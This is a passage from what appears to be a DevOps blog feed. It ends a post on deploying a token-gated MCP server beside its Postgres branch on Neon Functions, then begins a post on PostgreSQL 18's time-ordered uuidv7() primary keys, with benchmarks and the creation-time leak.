<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;deploy the MCP server&quot;,&quot;prompt&quot;:&quot;$&quot;,&quot;steps&quot;:[{&quot;comment&quot;:&quot;scaffold the mcp template&quot;},{&quot;cmd&quot;:&quot;npx neon bootstrap ./mcp-demo --template mcp&quot;,&quot;output&quot;:&quot;Scaffolded \&quot;MCP server\&quot; (23 files) into mcp-demo.&quot;},{&quot;cmd&quot;:&quot;cd mcp-demo &amp;&amp; npm install&quot;,&quot;output&quot;:&quot;added 180 packages&quot;},{&quot;comment&quot;:&quot;create + link a project in us-east-2, pulls DATABASE_URL into .env.local&quot;},{&quot;cmd&quot;:&quot;neon link&quot;,&quot;output&quot;:&quot;Created project platform-demo-mcp in aws-us-east-2 and linked branch main.&quot;},{&quot;comment&quot;:&quot;create the contacts table on the branch&quot;},{&quot;cmd&quot;:&quot;npm run db:push&quot;,&quot;output&quot;:&quot;[✓] Changes applied&quot;},{&quot;cmd&quot;:&quot;neon deploy&quot;,&quot;output&quot;:&quot;Applied changes\n  create  function:contacts\nFunction URLs\n  contacts: https://&lt;branch&gt;-contacts.compute.c-3.us-east-2.aws.neon.tech/&quot;}]}"></div><p>That last URL is the deployed MCP server. The function and the Postgres branch it queries are in the same region, <code>us-east-2</code>. The MCP endpoint is that URL plus <code>/mcp</code>. If you want to iterate before deploying, <code>neon dev</code> serves the same function locally at <code>http://localhost:8787</code> with the MCP endpoint at <code>/mcp</code>.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p>A Neon Function has a <strong>public HTTPS URL, reachable by anyone who has it.</strong> This example runs open for the demo, which is not acceptable for anything real: these tools read and write your database. Gate the endpoint before you share the URL.</p>
</div></div></div><p>The gate is a few lines of Hono middleware in front of <code>/mcp</code>. The repo ships it env-gated: leave <code>MCP_TOKEN</code> unset and the demo stays open, set it and every request needs the bearer token.</p>
<pre><code class="hljs language-typescript">app.<span class="hljs-title function_">use</span>(<span class="hljs-string">&#x27;/mcp&#x27;</span>, <span class="hljs-title function_">async</span> (c, next) =&gt; {
  <span class="hljs-keyword">const</span> token = process.<span class="hljs-property">env</span>.<span class="hljs-property">MCP_TOKEN</span>;
  <span class="hljs-keyword">if</span> (token &amp;&amp; c.<span class="hljs-property">req</span>.<span class="hljs-title function_">header</span>(<span class="hljs-string">&#x27;authorization&#x27;</span>) !== <span class="hljs-string">`Bearer <span class="hljs-subst">${token}</span>`</span>) {
    <span class="hljs-keyword">return</span> c.<span class="hljs-title function_">json</span>({ <span class="hljs-attr">error</span>: <span class="hljs-string">&#x27;unauthorized&#x27;</span> }, <span class="hljs-number">401</span>);
  }
  <span class="hljs-keyword">await</span> <span class="hljs-title function_">next</span>();
});
</code></pre><p>Most MCP clients can send custom headers, so the agent side is one config line (<code>Authorization: Bearer &lt;token&gt;</code>). I verified the gate directly against the app: no header and a wrong token both get a 401, the right token passes through to the transport, and with <code>MCP_TOKEN</code> unset the endpoint behaves exactly as before.</p>
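<p>The middleware above is open whenever <code>MCP_TOKEN</code> is unset or empty, and it checks the header with <code>!==</code>, a comparison that can return at the first differing character. The following is an added example, not code from the companion repo, of the same gate as a fail-closed decision function with a comparison that does not exit early; <code>checkMcpAuth</code>, <code>constantTimeEqual</code>, the <code>allowOpen</code> opt-in, <code>MCP_ALLOW_OPEN</code> and the 503 status are assumptions, and in a Node runtime <code>crypto.timingSafeEqual</code> over fixed-length digests is the usual primitive.</p>

```typescript
// Added example, not the companion repo's code. checkMcpAuth, constantTimeEqual
// and the allowOpen opt-in (MCP_ALLOW_OPEN below) are hypothetical names.

type GateResult = { status: 200 | 401 | 503; reason: string };

// Compare two strings without returning at the first mismatch, so the time
// taken does not depend on how many leading characters were correct.
function constantTimeEqual(a: string, b: string): boolean {
  const len = Math.max(a.length, b.length);
  let diff = a.length ^ b.length; // a length mismatch alone fails the check
  for (let i = 0; i !== len; i++) {
    // charCodeAt returns NaN past the end of a string; `| 0` maps NaN to 0.
    diff |= (a.charCodeAt(i) | 0) ^ (b.charCodeAt(i) | 0);
  }
  return diff === 0;
}

// Decide what the /mcp gate should answer.
//   configuredToken     : value of process.env.MCP_TOKEN (may be undefined or '')
//   authorizationHeader : value of the request's Authorization header
//   allowOpen           : explicit opt-in for the open demo mode (assumption)
function checkMcpAuth(
  configuredToken: string | undefined,
  authorizationHeader: string | undefined,
  allowOpen: boolean = false,
): GateResult {
  if (!configuredToken) {
    // Fail closed: a missing or empty token is a deployment error, not a
    // reason to expose tools that read and write the database.
    return allowOpen
      ? { status: 200, reason: 'open: no token configured, explicit opt-in' }
      : { status: 503, reason: 'closed: MCP_TOKEN is not configured' };
  }
  // Accept only "Bearer <token>"; the scheme name is case-insensitive.
  const match = /^Bearer +(\S+)$/i.exec(authorizationHeader ?? '');
  const presented = match?.[1] ?? '';
  if (!constantTimeEqual(presented, configuredToken)) {
    return { status: 401, reason: 'unauthorized' };
  }
  return { status: 200, reason: 'authorized' };
}

// Constructed sample requests (not captured traffic).
const SAMPLE_TOKEN = 'constructed-sample-token';
const samples: { label: string; token?: string; header?: string; allowOpen?: boolean }[] = [
  { label: 'no header', token: SAMPLE_TOKEN },
  { label: 'wrong token', token: SAMPLE_TOKEN, header: 'Bearer not-the-token' },
  { label: 'wrong scheme', token: SAMPLE_TOKEN, header: `Basic ${SAMPLE_TOKEN}` },
  { label: 'right token', token: SAMPLE_TOKEN, header: `Bearer ${SAMPLE_TOKEN}` },
  { label: 'token unset', header: 'Bearer anything' },
  { label: 'token empty', token: '', header: 'Bearer ' },
  { label: 'token unset, opt-in', allowOpen: true },
];

function runSamples(): string[] {
  return samples.map(
    (s) => `${s.label}: ${checkMcpAuth(s.token, s.header, s.allowOpen ?? false).status}`,
  );
}

// How this would sit in the page's Hono middleware, kept as a comment so the
// block runs without dependencies:
//
//   app.use('/mcp', async (c, next) => {
//     const r = checkMcpAuth(
//       process.env.MCP_TOKEN,
//       c.req.header('authorization'),
//       process.env.MCP_ALLOW_OPEN === '1',
//     );
//     if (r.status !== 200) return c.json({ error: r.reason }, r.status);
//     await next();
//   });

console.log(runSamples().join('\n'));
```

<p>With this shape, forgetting to set the secret on a new branch produces a refused endpoint rather than an open one, and the open demo mode has to be requested on purpose.</p>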
<h2 id="h2-wire-up-a-client-and-watch-it-work" class="group relative scroll-mt-24">
        <a href="#h2-wire-up-a-client-and-watch-it-work" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Wire up a client and watch it work
        </a>
        </h2><p>Any MCP client that speaks streamable HTTP can connect to <code>/mcp</code>. Here are three ways: a CLI, the SDK, and adding it to an agent.</p>
<div class="post-tabs not-prose" data-tabs="{&quot;title&quot;:&quot;Connect an MCP client to the deployed server&quot;,&quot;tabs&quot;:[{&quot;label&quot;:&quot;mcporter (CLI)&quot;,&quot;lang&quot;:&quot;bash&quot;,&quot;code&quot;:&quot;# List the tools the server advertises\nmcporter list https://&lt;branch&gt;-contacts.compute.c-3.us-east-2.aws.neon.tech/mcp --schema\n\n# Call a tool\nmcporter call \&quot;.../mcp.create_contact\&quot; name=\&quot;Ada Lovelace\&quot; company=\&quot;Analytical Engines\&quot;\nmcporter call \&quot;.../mcp.search_contacts\&quot; query=\&quot;engine\&quot;&quot;},{&quot;label&quot;:&quot;MCP SDK (Node)&quot;,&quot;lang&quot;:&quot;javascript&quot;,&quot;code&quot;:&quot;import { Client } from '@modelcontextprotocol/sdk/client/index.js';\nimport { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp.js';\n\nconst url = new URL('https://&lt;branch&gt;-contacts.compute.c-3.us-east-2.aws.neon.tech/mcp');\nconst client = new Client({ name: 'test', version: '1.0.0' });\nawait client.connect(new StreamableHTTPClientTransport(url));\n\nconsole.log((await client.listTools()).tools.map((t) =&gt; t.name));\nconst r = await client.callTool({ name: 'search_contacts', arguments: { query: 'ada' } });\nconsole.log(r.content[0].text);&quot;},{&quot;label&quot;:&quot;Claude / Cursor&quot;,&quot;lang&quot;:&quot;bash&quot;,&quot;code&quot;:&quot;# Point an MCP-aware agent at the URL as a streamable HTTP server.\n# add-mcp writes the client config for you:\nnpx add-mcp https://&lt;branch&gt;-contacts.compute.c-3.us-east-2.aws.neon.tech/mcp -a claude\n\n# Then in the agent: \&quot;search my contacts for anyone at the Navy\&quot;&quot;}]}"></div><p>I ran the SDK client against the deployed server from a machine in Europe. The handshake and the tool calls all worked on the first try:</p>
<pre><code class="hljs language-text">connect (initialize + handshake): ~1.5 s   (cold start ~2 s the first time)
tools/list: create_contact, update_contact, delete_contact, search_contacts
create_contact: 196 ms  -&gt;  { &quot;created&quot;: { &quot;id&quot;: 1, &quot;name&quot;: &quot;Ada Lovelace&quot;, ... } }
search_contacts &quot;navy&quot;: 150 ms  -&gt;  { &quot;count&quot;: 1, &quot;contacts&quot;: [ { &quot;name&quot;: &quot;Grace Hopper&quot;, ... } ] }
</code></pre><p>A direct <code>SELECT count(*)</code> against the branch afterwards showed the rows really landed in Postgres. Nothing is held in memory; the tools are just queries.</p>
<h2 id="h2-why-co-location-is-the-point" class="group relative scroll-mt-24">
        <a href="#h2-why-co-location-is-the-point" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why co-location is the point
        </a>
        </h2><p>Those tool-call numbers are around 150 to 200 milliseconds, but that is a measurement of my distance to the function, not the function&#39;s speed. I am in Europe and the function is in <code>us-east-2</code>, so each call is roughly one transatlantic round trip. An agent running near the region, or the model provider&#39;s own infrastructure calling the tool, sees a small fraction of that.</p>
<p>The number that does not move with the client&#39;s location is the hop from the function to Postgres, and that is the one co-location fixes. In the <a href="https://devops-daily.com/posts/neon-functions-compute-on-your-database-branch">first post in this series</a> I measured exactly that: a <code>SELECT</code> from inside the function against the co-located branch ran in about 1.2 ms, versus about 135 ms for the same query issued across the Atlantic.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;The hop that a database-backed MCP server actually spends its time on&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;Query from inside the Neon Function to its co-located Postgres branch, vs the same query issued cross-region (measured in the Functions #1 demo, us-east-2). Lower is better.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Function -&gt; co-located Postgres&quot;,&quot;value&quot;:1.2,&quot;series&quot;:&quot;co-located&quot;},{&quot;label&quot;:&quot;Cross-region -&gt; Postgres&quot;,&quot;value&quot;:135,&quot;series&quot;:&quot;cross-region&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;co-located&quot;,&quot;color&quot;:&quot;#f59e0b&quot;},{&quot;name&quot;:&quot;cross-region&quot;,&quot;color&quot;:&quot;#94a3b8&quot;}]}"></div><p>A tool call that runs one or two queries inherits that difference on every invocation. Put the MCP server a region away from its database and each tool call carries an extra cross-region round trip on top of whatever the client already paid to reach the server. Put the server on the branch and that part is effectively free. For a server whose entire job is querying Postgres, that is the hop worth optimizing.</p>
<h2 id="h2-one-endpoint-per-branch" class="group relative scroll-mt-24">
        <a href="#h2-one-endpoint-per-branch" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          One endpoint per branch
        </a>
        </h2><p>There is a second thing you get for free here. Neon Functions are deployed per branch, and each branch has its own function URL. Because a branch is also a copy of your data, that means every branch can have its own MCP server over its own dataset.</p>
<p>Spin up a branch for a preview environment and it comes with an MCP endpoint backed by that branch&#39;s data. Give an agent a scratch branch to work against and it cannot touch production. Run your CI against a branch and the agent&#39;s tools operate on the ephemeral copy, then it all gets thrown away with the branch. You are not standing up and tearing down a separate MCP service per environment; the endpoint rides along with the branch you already have.</p>
<h2 id="h2-the-repo" class="group relative scroll-mt-24">
        <a href="#h2-the-repo" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The repo
        </a>
        </h2><p>The full example, with all four CRUD tools, the schema, the deploy config, and client test scripts, is here:</p>
<div class="post-github not-prose" data-repo="The-DevOps-Daily/neon-mcp-demo"></div><h2 id="h2-wrapping-up" class="group relative scroll-mt-24">
        <a href="#h2-wrapping-up" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Wrapping up
        </a>
        </h2><p>An MCP server that fronts a database is mostly network and queries, and the network part is worth taking seriously because an agent may call these tools dozens of times in a single task. Neon Functions let you collapse the server-to-database distance to a same-region hop by deploying the MCP server onto the branch it queries, and the code to do it is small: a schema, a tool that runs a query, and the streamable HTTP transport. Point any MCP client at the URL and the agent has typed, database-backed tools running right next to the data. Give each branch its own endpoint and you get isolated, per-environment agent tooling without any extra services to run.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Stop Using Random UUIDs as Primary Keys: uuidv7() Lands in PostgreSQL 18]]></title>
      <link>https://devops-daily.com/posts/postgres-18-uuidv7-primary-keys</link>
      <description><![CDATA[Random UUIDv4 primary keys quietly wreck insert speed and bloat indexes on large tables. PostgreSQL 18 ships a native time-ordered uuidv7() that keeps the upsides of UUIDs without the B-tree penalty. Here are the numbers and how to adopt it.]]></description>
      <pubDate>Tue, 30 Jun 2026 15:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/postgres-18-uuidv7-primary-keys</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[PostgreSQL]]></category><category><![CDATA[Databases]]></category><category><![CDATA[Performance]]></category><category><![CDATA[UUID]]></category><category><![CDATA[Backend]]></category><category><![CDATA[DevOps]]></category>
      <content:encoded><![CDATA[<p>If you reach for <code>gen_random_uuid()</code> every time you need a primary key, you have probably never measured what it costs. On a small table, nothing. On a table with tens of millions of rows, random UUIDs turn every insert into a random write into the middle of your primary-key index, and that quietly drags down insert throughput, inflates index size, and burns through cache and WAL.</p>
<p>PostgreSQL 18 fixes the root cause with a native <code>uuidv7()</code> function. UUIDv7 is time-ordered, so new keys land at the right-hand edge of the B-tree like a sequential <code>bigint</code> would, while keeping the properties teams pick UUIDs for in the first place: generate them anywhere, no central sequence, no coordination. This post explains why the random version is slow, what changes with v7, the benchmark numbers on a 50-million-row table, the one real tradeoff, and how to adopt it without rewriting your schema.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li><code>uuidv4()</code> (random) primary keys scatter inserts across the whole index. On large tables that means constant page splits, low page density, fragmentation, and write amplification.</li>
<li>PostgreSQL 18 adds <code>uuidv7()</code>, a time-ordered UUID per <a href="https://datatracker.ietf.org/doc/html/rfc9562">RFC 9562</a>. New rows append at the index&#39;s right edge, like a sequential key.</li>
<li>In one published 50M-row benchmark, the initial bulk insert finished in about 1.8 minutes with v7 versus about 20 minutes with v4, and the index was roughly 25 percent smaller. Range scans by id ran about 3x faster.</li>
<li>The one real catch: a v7 value embeds its creation time, so do not hand it out as a public identifier if creation time is sensitive.</li>
<li><code>bigint</code> is still smaller and faster than any UUID. Use <code>uuidv7()</code> when you actually need UUID properties, not as a reflex.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>PostgreSQL 18 (the <code>uuidv7()</code> function is built in; no extension needed)</li>
<li>Basic familiarity with B-tree indexes and primary keys</li>
<li>A schema where you are choosing or reconsidering a primary-key type</li>
<li>Optional: <code>pg_stat_statements</code> and <code>\timing</code> if you want to measure on your own data</li>
</ul>
<h2 id="h2-why-random-uuids-are-slow-as-primary-keys" class="group relative scroll-mt-24">
        <a href="#h2-why-random-uuids-are-slow-as-primary-keys" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why random UUIDs are slow as primary keys
        </a>
        </h2><p>A primary key in PostgreSQL is backed by a B-tree index, and a B-tree stays sorted by key. Where a new key lands in that sorted structure is the whole story.</p>
<p>A <code>bigint</code> from a sequence always sorts after the previous one, so every insert lands at the right-hand edge of the tree. That rightmost page stays hot in memory, fills up, and splits cleanly. A random UUIDv4 has no order at all, so each insert lands at a random leaf page somewhere in the index.</p>
<pre><code class="hljs language-text">UUIDv4 (random)                       UUIDv7 / bigint (ordered)
inserts scatter across the tree       inserts append at the right edge

      [ root ]                              [ root ]
     /   |   \                             /   |   \
  [p1] [p2] [p3] ...                    [p1] [p2] [p3] [hot]
   ^    ^      ^                                        ^
  write write write                              every write here
  (cold pages pulled in,                         (one hot page, stays
   split, half-empty)                             in cache, fills, splits clean)
</code></pre><p>That random-write pattern has three compounding costs on a large table:</p>
<ul>
<li><strong>Page splits and low density.</strong> Inserting into the middle of a full page splits it, leaving both halves partly empty. Your index ends up larger than the data it indexes and full of slack.</li>
<li><strong>Cache misses.</strong> The working set is the entire index, not a hot tail. Once the index no longer fits in <code>shared_buffers</code>, every insert risks a random read from disk to fetch the target page.</li>
<li><strong>WAL and full-page-image amplification.</strong> The first write to a page after a checkpoint logs the whole page. More distinct pages touched per second means more full-page images and more WAL.</li>
</ul>
<p>None of this shows up at 10,000 rows. It shows up exactly when the table gets big enough to matter.</p>
<h2 id="h2-what-uuidv7-changes" class="group relative scroll-mt-24">
        <a href="#h2-what-uuidv7-changes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What uuidv7() changes
        </a>
        </h2><p>A UUIDv7 is laid out so the most significant bits are a timestamp. PostgreSQL 18 builds it from a 48-bit Unix millisecond timestamp, then a sub-millisecond fraction, then random bits, following RFC 9562. Because the timestamp is at the front and UUIDs sort lexically as 128-bit values, a v7 generated now always sorts after one generated a moment ago.</p>
<p>The result is that v7 keys behave like a sequence for index-locality purposes. Inserts append at the right edge, the hot page stays in cache, and pages fill before they split. You get the write pattern of a <code>bigint</code> with the generate-anywhere property of a UUID.</p>
<p>PostgreSQL 18 exposes three functions. The names are now explicit about the version:</p>
<pre><code class="hljs language-sql"><span class="hljs-comment">-- Version 4, random. These two are equivalent.</span>
<span class="hljs-keyword">SELECT</span> gen_random_uuid();      <span class="hljs-comment">-- 5b30857f-0bfa-48b5-ac0b-5c64e28078d1</span>
<span class="hljs-keyword">SELECT</span> uuidv4();               <span class="hljs-comment">-- b42410ee-132f-42ee-9e4f-09a6485c95b8</span>

<span class="hljs-comment">-- Version 7, time-ordered. New in PostgreSQL 18.</span>
<span class="hljs-keyword">SELECT</span> uuidv7();               <span class="hljs-comment">-- 019535d9-3df7-79fb-b466-fa907fa17f9e</span>

<span class="hljs-comment">-- Optional interval shift, handy for backfilling historical rows</span>
<span class="hljs-comment">-- with timestamps in the past.</span>
<span class="hljs-keyword">SELECT</span> uuidv7(shift <span class="hljs-operator">=</span><span class="hljs-operator">&gt;</span> <span class="hljs-string">&#x27;-7 days&#x27;</span>::<span class="hljs-type">interval</span>);
</code></pre><p>One useful detail: within a single backend session, PostgreSQL guarantees each <code>uuidv7()</code> it generates is strictly greater than the last, by spending some of the random bits on extra clock precision. So even a tight insert loop produces monotonic keys rather than occasionally colliding on the same millisecond.</p>
<h2 id="h2-the-numbers" class="group relative scroll-mt-24">
        <a href="#h2-the-numbers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The numbers
        </a>
        </h2><p>The performance argument is not subtle. Credativ published a <a href="https://www.credativ.de/en/blog/postgresql-en/a-deeper-look-at-old-uuidv4-vs-new-uuidv7-in-postgresql-18/">detailed comparison on PostgreSQL 18</a> using a single-column UUID primary key and 50 million rows. The initial bulk load is the headline:</p>
<p><strong>Time to insert 50M rows into an empty table.</strong> PostgreSQL 18, single UUID primary key, 50M rows. Source: credativ benchmark (2026). Lower is better.</p>
<table>
<thead>
<tr>
<th>Key type</th>
<th>Time (min)</th>
</tr>
</thead>
<tbody><tr>
<td>UUIDv4 (random)</td>
<td>20</td>
</tr>
<tr>
<td>UUIDv7 (time-ordered)</td>
<td>1.8</td>
</tr>
</tbody></table>
<p>The index size gap is just as real, and it widens when you insert into a table that already holds data, which is the normal case in production:</p>
<p><strong>Primary-key index size after inserting 50M rows.</strong> PostgreSQL 18, single UUID primary key. Source: credativ benchmark (2026). Lower is better.</p>
<table>
<thead>
<tr>
<th>Scenario</th>
<th>UUIDv4 (MB)</th>
<th>UUIDv7 (MB)</th>
</tr>
</thead>
<tbody><tr>
<td>Into empty table</td>
<td>1981</td>
<td>1504</td>
</tr>
<tr>
<td>Into 50M existing</td>
<td>3956</td>
<td>3008</td>
</tr>
</tbody></table>
<p>Reads benefit too. In the same benchmark, a range scan ordered by the id column ran roughly three times faster on v7 (about 113 ms versus 318 ms for a million-row <code>ORDER BY id</code>) and needed on the order of 100 times fewer buffer hits, because rows created near each other in time also sit near each other on disk. That locality is something a random UUID can never give you.</p>
<p>Two caveats on the numbers. They come from one benchmark on a synthetic single-column table, so treat the exact figures as directional rather than a promise for your workload. And the gap is smallest on tiny tables and largest on big ones, which is the whole point: this is a problem that scales with you.</p>
<h2 id="h2-uuidv7-vs-uuidv4-vs-bigint" class="group relative scroll-mt-24">
        <a href="#h2-uuidv7-vs-uuidv4-vs-bigint" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          uuidv7 vs uuidv4 vs bigint
        </a>
        </h2><p><code>uuidv7()</code> is not automatically the right choice. It sits between the other two options.</p>
<table>
<thead>
<tr>
<th></th>
<th>bigint sequence</th>
<th>uuidv4 (random)</th>
<th>uuidv7 (time-ordered)</th>
</tr>
</thead>
<tbody><tr>
<td>Size</td>
<td>8 bytes</td>
<td>16 bytes</td>
<td>16 bytes</td>
</tr>
<tr>
<td>Insert locality</td>
<td>Sequential (best)</td>
<td>Random (worst)</td>
<td>Sequential</td>
</tr>
<tr>
<td>Generate without the DB</td>
<td>No</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td>Reveals row count or order</td>
<td>Yes</td>
<td>No</td>
<td>Partially (creation time)</td>
</tr>
<tr>
<td>Leaks creation time</td>
<td>No</td>
<td>No</td>
<td>Yes</td>
</tr>
</tbody></table>
<p>The short version:</p>
<ul>
<li><strong>Reach for <code>bigint</code></strong> when a single database owns the sequence and you do not need to generate ids elsewhere. It is half the size of any UUID and the fastest option. The downside is that sequential integers leak how many rows you have and are trivially enumerable.</li>
<li><strong>Reach for <code>uuidv7()</code></strong> when you want UUIDs: ids generated by clients or multiple services, merged across shards, or created before a row reaches the database. It gives you that with almost none of the write penalty of v4.</li>
<li><strong>Reach for <code>uuidv4()</code></strong> only when you specifically need an identifier that reveals nothing, including when the row was created.</li>
</ul>
<h2 id="h2-the-one-real-catch-v7-leaks-creation-time" class="group relative scroll-mt-24">
        <a href="#h2-the-one-real-catch-v7-leaks-creation-time" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The one real catch: v7 leaks creation time
        </a>
        </h2><p>Because the timestamp sits in the high bits, anyone holding a v7 value can read roughly when it was generated. That is fine for an internal primary key. It is not fine if you expose the same value as a public identifier and the creation time is sensitive, for example a user id where signup time is private, or an order id where a competitor could infer your daily volume by diffing two ids.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p>Do not assume a UUID is opaque just because it looks random. A <code>uuidv7()</code> embeds a millisecond timestamp you can decode in seconds. If an identifier is shown to users or third parties and its creation time is sensitive, keep <code>uuidv7()</code> as the internal primary key and expose a separate <code>uuidv4()</code> (or another opaque token) externally.</p>
</div></div></div><p>This is a design decision, not a reason to avoid v7. Most primary keys never leave the backend, and for those the timestamp is a feature, not a leak.</p>
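<p>The timestamp really is that easy to read. The following Python sketch is an added example, not code from the original post: it decodes the first 48 bits of a UUID as Unix milliseconds, flags which identifiers in a list disclose their creation time, and issues a v7 internal key alongside an opaque v4 public id as the warning above recommends. The helper names and the <code>make_uuidv7</code> generator (plain random fill, not PostgreSQL's sub-millisecond scheme) are assumptions for illustration.</p>

```python
import os
import uuid
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)

# Sample values printed in the post's SQL listing.
POST_V7 = "019535d9-3df7-79fb-b466-fa907fa17f9e"
POST_V4 = "b42410ee-132f-42ee-9e4f-09a6485c95b8"


def embedded_time(identifier):
    """Return the creation time a UUIDv7 carries, or None for other versions."""
    u = uuid.UUID(identifier)
    if u.variant != uuid.RFC_4122 or u.version != 7:
        return None
    unix_ms = int.from_bytes(u.bytes[:6], "big")  # RFC 9562: first 48 bits
    return EPOCH + timedelta(milliseconds=unix_ms)


def audit_public_ids(identifiers):
    """Map each identifier that discloses its creation time to that time."""
    findings = {}
    for ident in identifiers:
        when = embedded_time(ident)
        if when is not None:
            findings[ident] = when.isoformat(timespec="milliseconds")
    return findings


def make_uuidv7(unix_ms):
    """Hypothetical helper: build a version 7 UUID for a chosen timestamp."""
    tail = bytearray(os.urandom(10))
    tail[0] = 0x70 | (tail[0] & 0x0F)   # version nibble = 7
    tail[2] = 0x80 | (tail[2] & 0x3F)   # variant bits = 10
    return uuid.UUID(bytes=unix_ms.to_bytes(6, "big") + bytes(tail))


def issue_ids(unix_ms):
    """Internal key stays time-ordered; the public id is an unrelated v4."""
    return {"id": str(make_uuidv7(unix_ms)), "public_id": str(uuid.uuid4())}


if __name__ == "__main__":
    # Only the v7 sample is reported; the v4 sample carries no timestamp.
    print(audit_public_ids([POST_V7, POST_V4]))
    # Constructed timestamps exactly one day apart.
    first, second = issue_ids(1_750_000_000_000), issue_ids(1_750_086_400_000)
    # The internal keys give away the interval between the two rows.
    print(embedded_time(second["id"]) - embedded_time(first["id"]))
    # The public ids give away nothing.
    print(audit_public_ids([first["public_id"], second["public_id"]]))
```

<p>Inside PostgreSQL, <code>uuid_extract_timestamp()</code> (available since version 17) returns the same field.</p>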
<h2 id="h2-how-to-adopt-it" class="group relative scroll-mt-24">
        <a href="#h2-how-to-adopt-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How to adopt it
        </a>
        </h2><p>For new tables, set the column default and move on:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">CREATE TABLE</span> orders (
    id          uuid <span class="hljs-keyword">PRIMARY KEY</span> <span class="hljs-keyword">DEFAULT</span> uuidv7(),
    customer_id uuid <span class="hljs-keyword">NOT NULL</span>,
    total_cents <span class="hljs-type">integer</span> <span class="hljs-keyword">NOT NULL</span>,
    created_at  timestamptz <span class="hljs-keyword">NOT NULL</span> <span class="hljs-keyword">DEFAULT</span> now()
);

<span class="hljs-keyword">INSERT INTO</span> orders (customer_id, total_cents)
<span class="hljs-keyword">VALUES</span> (uuidv7(), <span class="hljs-number">4999</span>)
RETURNING id;
</code></pre><p>For an existing table that already uses random UUIDs, you do not need a risky rewrite. The existing rows keep their v4 values and stay scattered, but every new row inserted with a v7 default lands in order, so the index stops degrading from that point forward. Switch the default:</p>
<pre><code class="hljs language-sql"><span class="hljs-comment">-- New rows get time-ordered ids; old rows are untouched.</span>
<span class="hljs-keyword">ALTER TABLE</span> orders <span class="hljs-keyword">ALTER</span> <span class="hljs-keyword">COLUMN</span> id <span class="hljs-keyword">SET</span> <span class="hljs-keyword">DEFAULT</span> uuidv7();
</code></pre><p>If you want the full benefit on historical data, you can rebuild the table or index during a maintenance window so the existing rows are stored in key order, but for many teams simply changing the default and letting the table grow in order is enough.</p>
<p>A few adoption notes:</p>
<ul>
<li><strong>Application-side generation still works.</strong> If your services generate ids before inserting, switch the client library to a UUIDv7 generator. Most language ecosystems now have one, and the database does not care who produced the value as long as it is a valid v7.</li>
<li><strong>ORMs are catching up.</strong> Check whether your ORM lets you set a database default expression for the id column; if so, <code>DEFAULT uuidv7()</code> is the cleanest path. If it generates ids in application code, point it at a v7 library.</li>
<li><strong>You do not need PostgreSQL 18 to start.</strong> If you are on 14 to 17, you can adopt UUIDv7 today by generating it in the application or with a small SQL function; the upgrade to 18 then just lets you drop that shim for the native function. Plenty of managed Postgres is already on 18 as well (Neon, for example, defaults new projects to Postgres 18), so you can try <code>uuidv7()</code> on a fresh database without upgrading anything yourself.</li>
</ul>
<h2 id="h2-key-takeaways" class="group relative scroll-mt-24">
        <a href="#h2-key-takeaways" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Key takeaways
        </a>
        </h2><ul>
<li>Random UUIDv4 primary keys are a silent scaling tax: random index writes mean page splits, bloated indexes, cache misses, and extra WAL once a table gets large.</li>
